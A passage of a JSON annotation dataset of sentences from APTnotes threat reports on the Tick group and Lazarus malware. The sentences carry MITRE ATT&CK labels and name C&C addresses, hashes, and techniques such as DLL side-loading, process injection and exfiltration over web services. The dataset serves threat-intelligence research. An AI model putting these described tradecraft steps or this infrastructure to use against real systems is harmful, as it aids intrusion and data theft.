Win64/ShadowPy.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s119-fbb357", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 119, "context_before": "8BC1F41A4DDF5CFF599570ED6645B706881BEEED vssapi.dll Win64/ShadowPy.", "sentence_text": "A ShadowPy downloader.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s120-1f0cfc", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 120, "context_before": "A ShadowPy downloader.", "sentence_text": "4300938A4FD4190A47EDD0D333E26C8FE2C7451E N/A Win64/TrojanDropper.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s122-e20269", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 122, "context_before": "Agent.", "sentence_text": "FU Trojanized Q‑dir installer, 64‑bit v Drops the customized ReVBShel version A.\nB9675D0EFBC4AE92E02B3BFC8CA04B01F8877DB6 N/A Win64/TrojanDropper.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s124-ab0730", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 124, "context_before": "Agent.", "sentence_text": "FU Trojanized Q-dir installer, 64-bit v Drops the customized ReVBShel version B.\nF54F91D143399B3C9E9F7ABF0C90D60B42BF25C9 N/A Win32/TrojanDownloader.Agent.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s125-1ad9e5", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 125, "context_before": "FU Trojanized Q‑dir installer, 64‑bit v Drops the customized ReVBShel version B.\nF54F91D143399B3C9E9F7ABF0C90D60B42BF25C9 N/A Win32/TrojanDownloader.Agent.", "sentence_text": "GBY Trojanized Q-dir installer, 32-bit v FE011D3BDF085B23E6723E8F84DD46BA63B2C700 N/A VBS/Agent.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s126-d02007", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 126, "context_before": "GBY Trojanized Q-dir installer, 32-bit v FE011D3BDF085B23E6723E8F84DD46BA63B2C700 N/A VBS/Agent.", "sentence_text": "DL Customized ReVBShell backdoo version A.\n02937E4A804F2944B065B843A31390FF958E2415 N/A VBS/Agent.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s127-3bb318", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 127, "context_before": "DL Customized ReVBShell backdoo version A.\n02937E4A804F2944B065B843A31390FF958E2415 N/A VBS/Agent.", "sentence_text": "C&C server 110.10.16[.]56 SK Broadband Co Ltd 2020‑08‑19 mssql.waterglue[.]org", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s128-6c9074", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 128, "context_before": "C&C server 110.10.16[.]56 SK Broadband Co Ltd 2020‑08‑19 mssql.waterglue[.]org", "sentence_text": "Netboy C&C server 103.127.124[.]117 MOACK.Co.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s129-718741", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 129, "context_before": "Netboy C&C server 103.127.124[.]117 MOACK.Co.", "sentence_text": "103.127.124[.]119 MOACK.Co.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s130-d15817", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 130, "context_before": "103.127.124[.]119 MOACK.Co.", "sentence_text": "103.127.124[.]76 MOACK.Co.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s131-06bd09", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 131, "context_before": "103.127.124[.]76 MOACK.Co.", "sentence_text": "58.230.118[.]78 SK Broadband Co Ltd 2022-01-25 oracle.eneygylakes[.]com Ghostdown server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s132-9a7221", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 132, "context_before": "58.230.118[.]78 SK Broadband Co Ltd 2022-01-25 oracle.eneygylakes[.]com Ghostdown server.", "sentence_text": "MITRE ATT&CK techniques This table was built using version 12 of the MITRE ATT&CK framework.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p10-s133-0c3c81", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 10, "sentence_id": 133, "context_before": "MITRE ATT&CK techniques This table was built using version 12 of the MITRE ATT&CK framework.", "sentence_text": "Tactic ID Name Description Initial T1195.002 Supply Chain Compromise: Tick compromised update servers to deliver malicious update packages via Access Compromise Software Supply the software developed by the compromised company.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s135-6f27e0", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 135, "context_before": "Chain\n10/11", "sentence_text": "Tactic ID Name Description T1199 Trusted Relationship Tick replaced legitimate applications used by technical support to compromise customers of the company.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s136-8ebe1c", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 136, "context_before": "Tactic ID Name Description T1199 Trusted Relationship Tick replaced legitimate applications used by technical support to compromise customers of the company.", "sentence_text": "Execution T1059.005 Command and Scripting Tick used a customized version of ReVBShell written in VBScript.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s137-3edf51", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 137, "context_before": "Execution T1059.005 Command and Scripting Tick used a customized version of ReVBShell written in VBScript.", "sentence_text": "Interpreter: Visual Basic T1059.006 Command and Scripting ShadowPy malware uses a downloader written in Python.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s138-c2c516", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 138, "context_before": "Interpreter: Visual Basic T1059.006 Command and Scripting ShadowPy malware uses a downloader written in Python.", "sentence_text": "Interpreter: Python\nPersistence T1547.001 Boot or Logon Autostart Netboy and ShadowPy loaders persist via a Run key.\nExecution:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s139-32f568", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 139, "context_before": "Interpreter: Python\nPersistence T1547.001 Boot or Logon Autostart Netboy and ShadowPy loaders persist via a Run key.\nExecution:", "sentence_text": "Registry Run Keys / Startup Folder T1543.003 Create or Modify System Netboy and ShadowPy loaders persist by creating a service.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s140-a84f42", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 140, "context_before": "Registry Run Keys / Startup Folder T1543.003 Create or Modify System Netboy and ShadowPy loaders persist by creating a service.", "sentence_text": "Process: Windows Service T1574.002 Hijack Execution Flow: DLL Netboy and ShadowPy loaders use legitimate service and description names Side-Loading when creating services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s141-21b09a", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 141, "context_before": "Process: Windows Service T1574.002 Hijack Execution Flow: DLL Netboy and ShadowPy loaders use legitimate service and description names Side-Loading when creating services.", "sentence_text": "Defense T1036.004 Masquerading: Masquerade Netboy and ShadowPy loaders use legitimate service and description names Evasion Task or Service when creating services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s142-c4b66e", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 142, "context_before": "Defense T1036.004 Masquerading: Masquerade Netboy and ShadowPy loaders use legitimate service and description names Evasion Task or Service when creating services.", "sentence_text": "T1036.005 Masquerading: Match Netboy and ShadowPy loaders use legitimate service and description names Legitimate Name or Location when creating services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s143-2a7feb", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 143, "context_before": "T1036.005 Masquerading: Match Netboy and ShadowPy loaders use legitimate service and description names Legitimate Name or Location when creating services.", "sentence_text": "Loaders contain garbage code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s144-ec267d", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 144, "context_before": "Loaders contain garbage code.", "sentence_text": "T1027.001 Obfuscated Files or Netboy and ShadowPy loaders DLLs are padded to avoid security solutions Information: Binary Padding from uploading samples.\nT1055.002 Process Injection: Portable Netboy and ShadowPy loaders inject a PE into a preconfigured system Executable Injection process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s145-f00861", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 145, "context_before": "T1027.001 Obfuscated Files or Netboy and ShadowPy loaders DLLs are padded to avoid security solutions Information: Binary Padding from uploading samples.\nT1055.002 Process Injection: Portable Netboy and ShadowPy loaders inject a PE into a preconfigured system Executable Injection process.", "sentence_text": "T1055.003 Process Injection: Thread Netboy and ShadowPy loaders hijack the main thread of the system process Execution Hijacking to transfer execution to the injected malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s146-434f20", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 146, "context_before": "T1055.003 Process Injection: Thread Netboy and ShadowPy loaders hijack the main thread of the system process Execution Hijacking to transfer execution to the injected malware.", "sentence_text": "Discovery T1135 Network Share Discovery Netboy has network discovery capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s147-099f42", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 147, "context_before": "Discovery T1135 Network Share Discovery Netboy has network discovery capabilities.", "sentence_text": "T1120 Peripheral Device Discovery Netboy enumerates all available drives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s148-d184e4", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 148, "context_before": "T1120 Peripheral Device Discovery Netboy enumerates all available drives.", "sentence_text": "T1057 Process Discovery Netboy and ReVBShell have process enumeration capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s149-c261ec", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 149, "context_before": "T1057 Process Discovery Netboy and ReVBShell have process enumeration capabilities.", "sentence_text": "T1082 System Information Discovery Netboy and ReVBShell, gather system information.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s150-8fb119", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 150, "context_before": "T1082 System Information Discovery Netboy and ReVBShell, gather system information.", "sentence_text": "T1033 System Owner/User Discovery Netboy and ReVBShell, gather user information.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s151-21895f", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 151, "context_before": "T1033 System Owner/User Discovery Netboy and ReVBShell, gather user information.", "sentence_text": "T1124 System Time Discovery Netboy uses system time to contact its C&C only during a certain time range.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s152-5f4d88", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 152, "context_before": "T1124 System Time Discovery Netboy uses system time to contact its C&C only during a certain time range.", "sentence_text": "Lateral T1080 Taint Shared Content Tick replaced legitimate applications used by technical support, which Movement resulted also in malware execution within the compromised network on previously clean systems.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1080", "name": "Taint Shared Content" } ], "procedure": "Replace legitimate applications used by technical support to enable malware execution on other systems in the network.", "entities": [ { "text": "Tick", "start": 35, "end": 39, "label": "ThreatActor" }, { "text": "replaced legitimate applications used by technical support", "start": 40, "end": 98, "label": "Action" } ] }, { "uid": "aptnotes-06_aptnotes_report-p11-s153-68b9f6", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 153, "context_before": "Lateral T1080 Taint Shared Content Tick replaced legitimate applications used by technical support, which Movement resulted also in malware execution within the compromised network on previously clean systems.", "sentence_text": "Collection T1039 Data from Network Shared Netboy and ReVBShell have capabilities to collect files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s154-bdd050", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 154, "context_before": "Collection T1039 Data from Network Shared Netboy and ReVBShell have capabilities to collect files.", "sentence_text": "Drive\nT1113 Screen Capture Netboy has screenshot capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s155-a48e18", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 155, "context_before": "Drive\nT1113 Screen Capture Netboy has screenshot capabilities.", "sentence_text": "Command T1071.001 Application Layer Protocol: ShadowPy and ReVBShell communicate via HTTP protocol with their C&C and Control Web Protocols server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s156-8f583e", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 156, "context_before": "Command T1071.001 Application Layer Protocol: ShadowPy and ReVBShell communicate via HTTP protocol with their C&C and Control Web Protocols server.", "sentence_text": "T1132.001 Data Encoding: Standard Tick’s customized ReVBShell uses base64 to encode communication with Encoding their C&C servers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s157-702bc3", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 157, "context_before": "T1132.001 Data Encoding: Standard Tick’s customized ReVBShell uses base64 to encode communication with Encoding their C&C servers.", "sentence_text": "T1573 Encrypted Channel Netboy uses RC4.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s158-3eb2d8", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 158, "context_before": "T1573 Encrypted Channel Netboy uses RC4.", "sentence_text": "ShadowPy uses AES.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s159-111a34", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 159, "context_before": "ShadowPy uses AES.", "sentence_text": "ShadowPy uses AES.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s160-4a385a", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 160, "context_before": "Exfiltration T1041 Exfiltration", "sentence_text": "Over C2 Channel Netboy and ReVBShell have exfiltration capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-06_aptnotes_report-p11-s161-218f41", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 161, "context_before": "Over C2 Channel Netboy and ReVBShell have exfiltration capabilities.", "sentence_text": "T1567.002 Exfiltration Over Web Service: Tick deployed a custom tool to download and exfiltrate files via a web service.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567.002", "name": "Exfiltration to Cloud Storage" } ], "procedure": "Deploy a custom tool to download and exfiltrate files via a web service.", "entities": [ { "text": "Tick", "start": 41, "end": 45, "label": "ThreatActor" }, { "text": "deployed a custom tool to download and exfiltrate files via a web service", "start": 46, "end": 119, "label": "Action" } ] }, { "uid": "aptnotes-06_aptnotes_report-p11-s162-4ec6c2", "source": "aptnotes", "doc_id": "06_aptnotes_report", "page_number": 11, "sentence_id": 162, "context_before": "T1567.002 Exfiltration Over Web Service: Tick deployed a custom tool to download and exfiltrate files via a web service.", "sentence_text": "Exfiltration to Cloud Storage 14 Mar 2023 - 11:30AM 11/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p1-s1-a1d5df", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "WinorDLL64: A backdoor from the vast Lazarus arsenal?\nwelivesecurity.com/2023/02/23/winordll64-backdoor-vast-lazarus-arsenal\nFebruary 23, 2023 ESET researchers have discovered one of the payloads of the Wslink downloader that we uncovered back in 2021.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p1-s2-2e7715", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "WinorDLL64: A backdoor from the vast Lazarus arsenal?\nwelivesecurity.com/2023/02/23/winordll64-backdoor-vast-lazarus-arsenal\nFebruary 23, 2023 ESET researchers have discovered one of the payloads of the Wslink downloader that we uncovered back in 2021.", "sentence_text": "We named this payload WinorDLL64 based on its filename WinorDLL64.dll.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p1-s3-99e3fc", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "We named this payload WinorDLL64 based on its filename WinorDLL64.dll.", "sentence_text": "Wslink, which had the filename WinorLoaderDLL64.dll, is a loader for Windows binaries that, unlike other such loaders, runs as a server and executes received modules in memory.", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": null, "procedure": "The loader runs as a server and executes modules in memory.", "entities": [ { "text": "runs as a server", "start": 119, "end": 135, "label": "Action" }, { "text": "executes received modules in memory", "start": 140, "end": 175, "label": "Action" } ] }, { "uid": "aptnotes-07_aptnotes_report-p1-s4-4673ec", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "Wslink, which had the filename WinorLoaderDLL64.dll, is a loader for Windows binaries that, unlike other such loaders, runs as a server and executes received modules in memory.", "sentence_text": "As the wording suggests, a loader serves as a tool to load a payload, or the actual malware, onto the already compromised system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p1-s5-78f65a", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "As the wording suggests, a loader serves as a tool to load a payload, or the actual malware, onto the already compromised system.", "sentence_text": "The initial Wslink compromise vector has not been identified.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p1-s6-105769", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "The initial Wslink compromise vector has not been identified.", "sentence_text": "The initially unknown Wslink payload was uploaded to VirusTotal from South Korea shortly after the publication of our blogpost, and hit one of our YARA rules based on Wslink’s unique name WinorDLL64.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p1-s7-465b08", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "The initially unknown Wslink payload was uploaded to VirusTotal from South Korea shortly after the publication of our blogpost, and hit one of our YARA rules based on Wslink’s unique name WinorDLL64.", "sentence_text": "Interestingly, it communicates over a connection that was already established by the Wslink loader.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p1-s8-3de275", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "Interestingly, it communicates over a connection that was already established by the Wslink loader.", "sentence_text": "In 2021, we did not find any data that would suggest Wslink is a tool from a known threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p1-s9-44d5d5", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "In 2021, we did not find any data that would suggest Wslink is a tool from a known threat actor.", "sentence_text": "US-CERT and the FBI call this group HIDDEN COBRA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p1-s10-517342", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 1, "sentence_id": 10, "context_before": "US-CERT and the FBI call this group HIDDEN COBRA.", "sentence_text": "It was the first recorded abuse of the vulnerability; in combination, the tool and the vulnerability led to the blinding of the monitoring of all security solutions on compromised machines.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p1-s11-b6813e", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 1, "sentence_id": 11, "context_before": "It was the first recorded abuse of the vulnerability; in combination, the tool and the vulnerability led to the blinding of the monitoring of all security solutions on compromised machines.", "sentence_text": "We also provided an extensive description of the structure of the virtual machine used in samples of Wslink.\n1/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p2-s12-a20a09", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 2, "sentence_id": 12, "context_before": "We also provided an extensive description of the structure of the virtual machine used in samples of Wslink.\n1/11", "sentence_text": "This blogpost explains the attribution of WinorDLL64 to Lazarus and provides an analysis of the payload.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p2-s13-ab866c", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 2, "sentence_id": 13, "context_before": "This blogpost explains the attribution of WinorDLL64 to Lazarus and provides an analysis of the payload.", "sentence_text": "Links to Lazarus We have discovered overlaps in both behavior and code with Lazarus samples from Operation GhostSecret and the Bankshot implant described by McAfee.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p2-s14-27a2f2", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "Links to Lazarus We have discovered overlaps in both behavior and code with Lazarus samples from Operation GhostSecret and the Bankshot implant described by McAfee.", "sentence_text": "The description of the implants in both GhostSecret and Bankshot articles contains overlaps in the functionality with WinorDLL64 and we found some code overlap in the samples.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p2-s15-834a38", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "The description of the implants in both GhostSecret and Bankshot articles contains overlaps in the functionality with WinorDLL64 and we found some code overlap in the samples.", "sentence_text": "In this blogpost we will only use the FE887FCAB66D7D7F79F05E0266C0649F0114BA7C sample from GhostSecret for comparison against WinorDLL64 (1BA443FDE984CEE85EBD4D4FA7EB1263A6F1257F), unless specified otherwise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p2-s16-658a7a", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 2, "sentence_id": 16, "context_before": "In this blogpost we will only use the FE887FCAB66D7D7F79F05E0266C0649F0114BA7C sample from GhostSecret for comparison against WinorDLL64 (1BA443FDE984CEE85EBD4D4FA7EB1263A6F1257F), unless specified otherwise.", "sentence_text": "The following details summarize the supporting facts for our low confidence attribution to Lazarus:\n1. Victimology\nFellow researchers from AhnLab confirmed South Korean victims of Wslink in their telemetry, which is a relevant indicator considering the traditional Lazarus targets and that we have observed only a few hits.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p2-s17-005311", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 2, "sentence_id": 17, "context_before": "The following details summarize the supporting facts for our low confidence attribution to Lazarus:\n1. Victimology\nFellow researchers from AhnLab confirmed South Korean victims of Wslink in their telemetry, which is a relevant indicator considering the traditional Lazarus targets and that we have observed only a few hits.", "sentence_text": "Malware\nThe latest GhostSecret sample reported by McAfee (FE887FCAB66D7D7F79F05E0266C0649F0114BA7C) is from February 2018; we spotted the first sample of Wslink in late 2018 and fellow researchers reported hits in August 2018, which they disclosed after our publication.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p2-s18-966eaf", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 2, "sentence_id": 18, "context_before": "Malware\nThe latest GhostSecret sample reported by McAfee (FE887FCAB66D7D7F79F05E0266C0649F0114BA7C) is from February 2018; we spotted the first sample of Wslink in late 2018 and fellow researchers reported hits in August 2018, which they disclosed after our publication.", "sentence_text": "Hence, these samples were spotted a relatively short period of time apart.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p3-s20-884e9c", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 3, "sentence_id": 20, "context_before": "2/11", "sentence_text": "The PE rich headers indicate that the same development environment and projects of similar size were used in several other known Lazarus samples (e.g., 70DE783E5D48C6FBB576BC494BAF0634BC304FD6;\n8EC9219303953396E1CB7105CDB18ED6C568E962).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p3-s21-9b1f79", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 3, "sentence_id": 21, "context_before": "The PE rich headers indicate that the same development environment and projects of similar size were used in several other known Lazarus samples (e.g., 70DE783E5D48C6FBB576BC494BAF0634BC304FD6;\n8EC9219303953396E1CB7105CDB18ED6C568E962).", "sentence_text": "We found this overlap using the following rules that cover only these Wslink and Lazarus samples, which is an indicator with a low weight.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p3-s22-f910e1", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 3, "sentence_id": 22, "context_before": "We found this overlap using the following rules that cover only these Wslink and Lazarus samples, which is an indicator with a low weight.", "sentence_text": "We tested them on VirusTotal’s retrohunt and our internal file corpus.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p3-s24-1dfd15", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 3, "sentence_id": 24, "context_before": "rich_signature.length", "sentence_text": "[EXP] VS2010 build 30319 count=1", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p3-s25-37d65b", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 3, "sentence_id": 25, "context_before": "[EXP] VS2010 build 30319 count=1", "sentence_text": "[ASM] VS2010 build 30319 count=10 [ C ] VS2010 build 30319 count in [ 90 .. 108 ] The GhostSecret article described “a unique data-gathering and implant-installation component that listens on port 443 for inbound control server connections” that additionally ran as a service.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p3-s26-9d4b38", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 3, "sentence_id": 26, "context_before": "[ASM] VS2010 build 30319 count=10 [ C ] VS2010 build 30319 count in [ 90 .. 108 ]\nThe GhostSecret article described “a unique data-gathering and implant-installation component that listens on port 443 for inbound control server connections” that additionally ran as a service.", "sentence_text": "The loader is virtualized by Oreans’ Code Virtualizer, which is a commercial protector that is used frequently by Lazarus.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-07_aptnotes_report-p3-s27-42ad40", "source": "aptnotes", "doc_id": "07_aptnotes_report", "page_number": 3, 